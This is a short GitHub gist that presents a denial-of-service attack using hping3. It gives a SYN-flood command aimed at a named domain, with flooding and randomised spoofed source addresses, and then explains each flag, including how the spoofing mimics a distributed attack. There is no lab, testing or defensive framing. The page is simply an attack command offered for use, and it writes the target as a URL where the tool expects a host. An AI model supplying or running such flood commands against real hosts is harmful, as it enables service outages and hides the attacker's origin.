Skip to content

Instantly share code, notes, and snippets.

@ouic
ouic / dos.md
Created April 22, 2026 11:12 — forked from davidlares/dos.md
DoS attack with hping3

DoS Attack with Hping3

Run the command: hping3 --flood -S -V --rand-source http://stv.com

Where:

  1. --flood send packets as fast as possible
  2. -S (Syn packet): legit TCP packet connection
  3. -V verbose mode
  4. --rand-source randomize the IP source address, like it's requested from different systems (sort of DDoS)